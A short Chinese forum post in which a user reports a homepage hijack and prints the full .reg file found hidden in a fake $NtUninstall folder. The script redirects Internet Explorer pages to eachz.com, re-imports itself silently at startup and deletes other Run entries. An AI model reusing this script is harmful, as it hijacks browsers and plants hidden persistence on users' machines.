见天打开电脑,看到主页被修改了,REGEDIT导出注册表后,用XP的恢复功能,恢复成功。
研究导出的文件,抓到一个特务
C:$NtUninstallQ887678$WINSYS2.cer"
我在REGEDIT里抓到了它的尾巴,在WINDOWS里根本看不到他,
退到DOS下,找到了这个文件,打开一看是个注册表文件
内容如下:
REGEDIT4
[HKEY_CURRENT_USERSoftwareMicrosoftInternet Explorer]
"SearchURL"="http://www.eachz.com/"
[HKEY_USERS.DefaultSoftwareMicrosoftInternet Explorer]
"SearchURL"="http://www.eachz.com/"
[HKEY_USERS.DefaultSoftwareMicrosoftInternet ExplorerMain]
"Search Page"="http://www.eachz.com/"
"Default_Search_URL"="http://www.eachz.com/"
"Search Bar"="http://www.eachz.com/"
[HKEY_CURRENT_USERSoftwareMicrosoftInternet ExplorerSearch]
"SearchAssistant"="http://www.eachz.com/"
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftInternet ExplorerSearch]
"SearchAssistant"="http://www.eachz.com/"
[HKEY_USERS.DefaultSoftwareMicrosoftInternet ExplorerSearch]
"SearchAssistant"="http://www.eachz.com/"
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftInternet ExplorerMain]
"Start Page"="http://www.eachz.com/"
"First Home Page"="http://www.eachz.com/"
"Default_Search_URL"="http://www.eachz.com/"
"Search Page"="http://www.eachz.com/"
"Search Bar"="http://www.eachz.com/"
"Local Page"="http://www.eachz.com/"
[-HKEY_CURRENT_USERSoftwareMicrosoftwindowsCurrentVersionRun]
[HKEY_CURRENT_USERSoftwareMicrosoftwindowsCurrentVersionRun]
@="regedit -s C:$NtUninstallQ887678$WINSYS2.cer"
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftInternet ExplorerMain]
"Default_Page_URL"="http://www.eachz.com/"
[HKEY_CURRENT_USERSoftwareMicrosoftInternet ExplorerMain]
"Default_Search_URL"="http://www.eachz.com/"
"Search Page"="http://www.eachz.com/"
"Search Bar"="http://www.eachz.com/"
"SearchURL"="http://www.eachz.com/"
"Start Page"="http://www.eachz.com/"
"First Home Page"="http://www.eachz.com/"
"Default_Page_URL"="http://www.eachz.com/"
"Local Page"="http://www.eachz.com/"
[-HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunOnce]
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunOnce]
"WlN32"="C:$NtUninstallQ887678$WINSYS.vbs"
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]
"WlN32"="regedit -s C:$NtUninstallQ887678$WINSYS2.cer"
"internat.exe"="internat.exe"
"zwupdows"=-
"win"=-
"mwin"=-
"intenet"=-
"Inernet"=-
"Internet"=-
"iexpleror"=-
"zxdows"=-
"qwe"=-
"win1"=-
"winwin"=-
"9i5zxdows"=-
"9i5com01zxdows"=-
"99zxdows"=-
"syste"=-
"intelnat.exe"=-
"88zxdows"=-
"Start Pagewin"=-
"Start Page"=-
"9i5comzxdows"=-
"9q5zxdows"=-
"999izxdows"=-
"033zxdows"=-
"8zxdows"=-
"flash"=-
"3zxdows"=-
"interneet.exe"=-
"u88y"=-
"88u88"=-
"u18"=-
"u1881"=-
"u1882"=-
"u1883"=-
"u1884"=-
"u1885"=-
"u1886"=-
"u1887"=-
"u1888"=-
"system"=-
"u188"=-
"iexpler"=-
"u1810"=-
"WIN32"=-
--文学城www.wenxuecity.com--